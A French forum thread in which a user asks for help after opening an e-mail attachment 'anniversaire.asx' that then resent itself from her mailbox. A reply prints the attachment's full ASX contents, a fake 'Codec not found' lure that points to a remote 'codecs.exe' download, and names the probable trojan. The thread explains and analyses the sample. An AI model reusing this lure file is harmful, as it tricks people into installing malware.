OVH Cloud OVH Cloud

anniversaire.asx

1 réponse
Avatar
Hélène Levernieux
Bonjour à tous...

Je vous explique la situation : un mail provenant d'une connaissance, dedans
une pièce jointe appalée "anniversaire.asx" que j'ai ouverte (damned...)
évidemment impossible à ouvrir.. j'ai pas insisté

Mais aujourd'hui je reçois ce même mail de ma propre boîte... oups... là
problème... Je viens de comprendre que c'est un virus... et qu'il s'est
renvoyé via ma boîte mail...

Le truc, c'est que je ne trouve pas d'info sur ce virus, et qu'à par s' être
renvoyé via mon mail, je n'ai rien à déplorer...
Mon antivirus n'a rien détécté...
Par contre j'ai constaté qu'il n'est pas passé par mon carnet d'adresse mais
s'est envoyé aléatoirement à des adresses mails de qui j'ai reçu des
messages ou à qui j'en ai envoyé (ne serait-ce qu'une fois...)

Du coup, je reçois : réponses automatiques de supports que j'ai un jour
contactés, réponses auto de ma banquière qui est en vacances, réponses de
contacts qui me disent "mais qui vous êtes, on n'ouvre pas de pièces jointes
de gens qu'on connait pas..."
En plus, apparemment, il s'envoie de ma boîte vers des adresse que je n'ai
JAMAIS contacté
bref, je suis bien embêtée...

Help...

1 réponse

Avatar
Jacques et Marie
Hélène Levernieux a émis l'idée suivante :
Bonjour à tous...


Bonjour,

Je vous explique la situation : un mail provenant d'une connaissance, dedans
une pièce jointe appalée "anniversaire.asx" que j'ai ouverte (damned...)
évidemment impossible à ouvrir.. j'ai pas insisté


j'ai reçu ce message aussi, il s'agit en fait d'un fichier texte :
<ASX version="3.0">
<ENTRY>
<TITLE>Codec not found</TITLE>
<REF HREF ="http://updatecodecs.t35.com/video.avi"/>
<DURATION VALUE="60:00"/>
<BANNER HREF ="http://updatecodecs.t35.com/img_en.gif">
<ABSTRACT>Download Codecs</ABSTRACT>
<MOREINFO HREF ="http://updatecodecs.t35.com/codecs.exe" />
</BANNER>
</ENTRY>
</ASX>

Je ne connais pas beaucoup ASX (et n'ai pas plus envie que ça
d'apprendre) mais le résultat qu'on peut imaginer, c'est qu'en tentant
de l'ouvrir, ça affiche un message semblant indiquer que le codec
approprié n'a pas été trouvé et qu'il faut le télécharger.

Il faut sans doute alors accepter de télécharger le prétendu codec pour
l'activer.

Le truc, c'est que je ne trouve pas d'info sur ce virus, et qu'à par s' être
renvoyé via mon mail, je n'ai rien à déplorer...
Mon antivirus n'a rien détécté...


En cherchant sur le web, on trouve que probalement s'agit il du virus
Trojan.Downloader.VB.FT (aka Trojan-Downloader.Win32.VB.ft ).

Pour confirmer, tu peux essayer le scanner online de kaspersky :
http://webscanner.kaspersky.fr/

Amicalement
Jacques